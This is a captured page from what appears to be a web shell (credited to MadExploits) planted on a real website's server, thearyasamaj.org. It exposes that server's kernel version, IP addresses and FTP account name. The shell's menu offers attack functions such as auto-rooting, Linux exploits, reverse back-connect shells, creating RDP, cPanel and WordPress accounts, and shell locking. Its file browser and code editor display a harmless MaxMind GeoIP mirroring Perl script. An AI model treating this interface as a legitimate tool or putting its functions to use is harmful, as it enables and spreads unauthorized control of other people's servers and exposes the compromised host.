Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Geo-IP /
example /
[ HOME SHELL ]
Name
Size
Permission
Action
benchmark.pl
1.77
KB
-rw-r--r--
city.pl
677
B
-rw-r--r--
country_v6.pl
443
B
-rw-r--r--
geolite-mirror-simple.pl
1.71
KB
-rw-r--r--
netspeed.pl
483
B
-rw-r--r--
netspeedcell.pl
201
B
-rw-r--r--
org.pl
642
B
-rw-r--r--
region.pl
381
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : geolite-mirror-simple.pl
#!/usr/bin/perl use strict; use warnings; our $VERSION = '0.02'; use LWP::Simple qw/ mirror RC_NOT_MODIFIED RC_OK $ua /; use File::Copy qw/ mv /; use File::Spec; use PerlIO::gzip; # --- maxmind.com - please send comments to support@maxmind.com # # mirror various maxmind databases from geolite.maxmind.com. # The script download only changed files, unzip the files and # move it into the desired directory. # # Here is a sample cron entry that check daily for new files. # 34 15 * * * /usr/local/bin/geolite-mirror-simple.pl # adjust the path to your needs. Make sure the directories exists -d ( my $download_dir = '/usr/local/share/GeoIP/download' ) or die $!; -d ( my $dest_dir = '/usr/local/share/GeoIP' ) or die $!; # --- remove lines you do not need # geoip customers should rename or remove GeoIP.dat.gz and GeoIPCity.dat.gz # This example overwrite your GeoIPCity.dat database! my %mirror = ( # local-filename geolite-name 'GeoIP.dat.gz' => 'GeoLiteCountry/GeoIP.dat.gz', 'GeoIPCity.dat.gz' => 'GeoLiteCity.dat.gz', 'GeoIPv6.dat.gz' => 'GeoIPv6.dat.gz', 'GeoIPASNum.dat.gz' => 'asnum/GeoIPASNum.dat.gz' ); $ua->agent("MaxMind-geolite-mirror-simple/$VERSION"); my $dl_path = 'http://geolite.maxmind.com/download/geoip/database/'; chdir $download_dir or die $!; for my $f ( keys %mirror ) { my $rc = mirror( $dl_path . $mirror{$f}, $f ); next if $rc == RC_NOT_MODIFIED; if ( $rc == RC_OK ) { ( my $outfile = $f ) =~ s/\.gz$//; open my $in, '<:gzip', $f or die $!; open my $out, '>', $outfile or die $!; print $out $_ or die $! while <$in>; mv( $outfile, File::Spec->catfile( $dest_dir, $outfile ) ) or die $!; } } exit 0;
Close